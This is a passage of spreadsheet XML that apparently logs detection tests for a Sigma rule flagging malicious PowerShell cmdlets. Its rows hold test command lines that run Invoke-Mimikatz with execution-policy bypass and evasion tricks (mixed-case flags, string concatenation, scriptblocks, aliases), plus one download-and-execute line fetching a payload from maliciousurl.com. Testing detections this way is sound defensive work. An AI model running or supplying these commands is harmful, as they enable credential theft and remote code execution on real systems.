      <c r="D847" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E847" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F847" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G847" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H847" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I84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847" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K847" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="848" ht="15.75" customHeight="1" s="42">
      <c r="A848" s="43" t="n"/>
      <c r="B848" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C848" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D848" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E848" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F848" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G848" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H848" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I84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848" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K848" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="849" ht="15.75" customHeight="1" s="42">
      <c r="A849" s="43" t="n"/>
      <c r="B849" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C849" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D849" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E849" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F849" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G849" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H849" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I84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849" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K849" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="850" ht="15.75" customHeight="1" s="42">
      <c r="A850" s="43" t="n"/>
      <c r="B850" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C850" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D850" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E850" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F850" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G850" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H850" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I85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850" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K850" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="851" ht="15.75" customHeight="1" s="42">
      <c r="A851" s="43" t="n"/>
      <c r="B851" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C851" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D851" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E851" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F851" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G851" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H851" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I85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851" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K851" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="852" ht="15.75" customHeight="1" s="42">
      <c r="A852" s="43" t="n"/>
      <c r="B852" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C852" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D852" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E852" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F852" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G852" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H852" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I85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852" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K852" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="853" ht="15.75" customHeight="1" s="42">
      <c r="A853" s="43" t="n"/>
      <c r="B853" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C853" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D853" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E853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853" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G853" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H853" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I853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853" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K853" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="854" ht="15.75" customHeight="1" s="42">
      <c r="A854" s="43" t="n"/>
      <c r="B854" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C854" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D854" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E854" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F854" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G854" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H854" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I85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854" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K854" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="855" ht="15.75" customHeight="1" s="42">
      <c r="A855" s="43" t="n"/>
      <c r="B855" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C855" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D855" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E855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855" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G855" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H855" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I855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855" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K855" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="856" ht="15.75" customHeight="1" s="42">
      <c r="A856" s="43" t="n"/>
      <c r="B856" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C856" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D856" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E856" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F856" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G856" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H856" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I856" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J856" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K856" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="857" ht="15.75" customHeight="1" s="42">
      <c r="A857" s="43" t="n"/>
      <c r="B857" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C857" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D857" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E857" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F857" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G857" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H857" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I857" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J857" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K857" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="858" ht="15.75" customHeight="1" s="42">
      <c r="A858" s="43" t="n"/>
      <c r="B858" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C858" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D858" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E858" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F858" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G858" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H858" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I858" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J858" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K858" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="859" ht="15.75" customHeight="1" s="42">
      <c r="A859" s="43" t="n"/>
      <c r="B859" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C859" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D859" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E859" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F859" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G859" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H859" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I859" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J859" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K859" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="860" ht="15.75" customHeight="1" s="42">
      <c r="A860" s="43" t="n"/>
      <c r="B860" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C860" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D860" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E860" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F860" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G860" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H860" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I860" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J860" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K860" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="861" ht="15.75" customHeight="1" s="42">
      <c r="A861" s="43" t="n"/>
      <c r="B861" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C861" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D861" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E861" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F861" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G861" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H861" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I861" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J861" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K861" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="862" ht="15.75" customHeight="1" s="42">
      <c r="A862" s="43" t="n"/>
      <c r="B862" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C862" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D862" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E862" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F862" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G862" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H862" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I862" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J862" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K862" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="863" ht="15.75" customHeight="1" s="42">
      <c r="A863" s="43" t="n"/>
      <c r="B863" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C863" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D863" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E863" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F863" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G863" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H863" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I863" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J863" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K863" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="864" ht="15.75" customHeight="1" s="42">
      <c r="A864" s="43" t="n"/>
      <c r="B864" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C864" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D864" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E864" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F864" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G864" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H864" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I864" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J864" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K864" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="865" ht="15.75" customHeight="1" s="42">
      <c r="A865" s="43" t="n"/>
      <c r="B865" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C865" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D865" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E865" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F865" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G865" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H865" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I865" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J865" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K865" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="866" ht="15.75" customHeight="1" s="42">
      <c r="A866" s="43" t="n"/>
      <c r="B866" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C866" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D866" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E866" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F866" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G866" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H866" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I866" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J866" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K866" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="867" ht="15.75" customHeight="1" s="42">
      <c r="A867" s="43" t="n"/>
      <c r="B867" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C867" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D867" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E867" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F867" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G867" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H867" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I867" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J867" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K867" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="868" ht="15.75" customHeight="1" s="42">
      <c r="A868" s="43" t="n"/>
      <c r="B868" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C868" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D868" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E868" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F868" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G868" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H868" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I8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68" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K868" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="869" ht="15.75" customHeight="1" s="42">
      <c r="A869" s="43" t="n"/>
      <c r="B869" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C869" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D869" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E869" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F869" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G869" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H869" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I86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69" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K869" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="870" ht="15.75" customHeight="1" s="42">
      <c r="A870" s="43" t="n"/>
      <c r="B870" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C870" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D870" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E870" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F870" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G870" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H870" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I87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70" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K870" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="871" ht="15.75" customHeight="1" s="42">
      <c r="A871" s="43" t="n"/>
      <c r="B871" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C871" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D871" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E871" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F871" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G871" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H871" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I87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71" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K871" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="872" ht="15.75" customHeight="1" s="42">
      <c r="A872" s="43" t="n"/>
      <c r="B872" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C872" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D872" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E872" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F872" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G872" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H872" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I872" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J872" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K872" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="873" ht="15.75" customHeight="1" s="42">
      <c r="A873" s="43" t="n"/>
      <c r="B873" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C873" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D873" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E873" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F873" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G873" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H873" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I873" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J873" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K873" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="874" ht="15.75" customHeight="1" s="42">
      <c r="A874" s="43" t="n"/>
      <c r="B874" s="36" t="inlineStr">
